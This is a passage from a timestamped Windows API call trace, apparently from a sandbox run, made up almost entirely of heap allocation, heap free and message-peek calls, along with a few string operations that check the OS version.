0x24b13d8 [0196.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.072] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0196.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0196.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0196.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0196.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0196.073] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0196.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0196.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0196.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0196.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0196.073] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0196.073] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0196.074] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0196.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.075] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0196.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0196.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0196.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0196.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0196.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0196.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0196.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.075] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0196.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0196.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0196.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0196.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.077] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0196.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0196.077] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0196.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0196.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0196.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0196.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0196.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0196.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0196.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0196.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0196.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0196.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0196.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0196.079] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0196.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0196.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0196.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.079] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0196.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0196.079] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0196.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0196.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0196.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0196.080] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0196.080] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0196.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0196.080] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0196.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0196.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0196.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0196.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0196.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0196.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0196.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0196.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0196.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: 